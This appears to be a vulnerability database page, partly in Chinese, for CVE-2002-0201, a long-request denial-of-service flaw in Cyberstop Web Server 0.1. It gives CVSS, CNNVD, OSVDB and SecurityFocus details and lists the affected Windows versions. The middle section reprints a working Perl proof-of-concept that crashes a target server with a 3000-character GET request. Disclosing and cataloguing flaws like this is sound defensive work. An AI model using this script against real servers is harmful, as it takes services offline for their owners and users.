CVE-2002-0201
CVSS5.0
发布时间 :2002-05-16 00:00:00
修订时间 :2016-10-17 22:17:03
NMCOES    

[原文]Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.


[CNNVD]Cyberstop Web Server超长请求拒绝服务攻击漏洞(CNNVD-200205-011)

        
        Cyberstop是一个Windows 9x/NT/2000系统下的Web服务器程序。
        Cyberstop设计上存在漏洞,远程攻击者可以对服务器程序实施拒绝服务攻击。
        通过提交超长的请求给服务器程序,程序就会崩溃,需要重启机器才能恢复功能。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0201
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0201
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-011
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101174569103289&w=2
(UNKNOWN)  BUGTRAQ  20020122 CyberStop-Server-DoS-remote-attacks
http://www.iss.net/security_center/static/7960.php
(VENDOR_ADVISORY)  XF  cyberstop-long-request-dos(7960)
http://www.securityfocus.com/bid/3930
(UNKNOWN)  BID  3930

- 漏洞信息

Cyberstop Web Server超长请求拒绝服务攻击漏洞
中危 其他
2002-05-16 00:00:00 2005-10-20 00:00:00
远程  
        
        Cyberstop是一个Windows 9x/NT/2000系统下的Web服务器程序。
        Cyberstop设计上存在漏洞,远程攻击者可以对服务器程序实施拒绝服务攻击。
        通过提交超长的请求给服务器程序,程序就会崩溃,需要重启机器才能恢复功能。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止此服务器程序的使用。
        厂商补丁:
        www.cyberstop.com.sg
        --------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.cyberstop.com.sg/webserver/webserver.zip

- 漏洞信息 (21237)

Cyberstop Web Server 0.1 Long Request DoS Vulnerability (EDBID:21237)
windows dos
2002-01-22 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/3930/info

Cyberstop is a web server for Windows 9x/NT/2000 systems.

Attacks can be launched on a Cyberstop host if a request is submitted containing an unusual number of arbitrary characters. Cyberstop web server will stop responding, a restart of the application may be required in order to regain normal functionality. 

#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server, 
# resulting in the server crashing.
#
# CyberStop WEbserver v0.1 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x Cyber_DoS.pl -s <server>
#
# Example: 
#
# perl -x Cyber_DoS.pl -s 10.0.0.1
# 
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "3000";
$data .= $def x $num;
$serv = $args{s};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";


$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";


print("\nCrash was successful !\n\n");

sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
		

- 漏洞信息

11347
Cyberstop Web Server HTTP GET Request Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-01-22 Unknow
2002-01-22 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cyberstop Web Server Long Request DoS Vulnerability
Failure to Handle Exceptional Conditions 3930
Yes No
2002-01-22 12:00:00 2009-07-11 09:56:00
Discovered and posted to Bugtraq by al3x hernandez <al3xhernandez@ureach.com>.

- 受影响的程序版本

Cyberstop Web Server for Windows 0.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0

- 漏洞讨论

Cyberstop is a web server for Windows 9x/NT/2000 systems.

Attacks can be launched on a Cyberstop host if a request is submitted containing an unusual number of arbitrary characters. Cyberstop web server will stop responding, a restart of the application may be required in order to regain normal functionality.

- 漏洞利用

Alex Hernandez &lt;al3xhernandez@ureach.com&gt; has provided an exploit:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站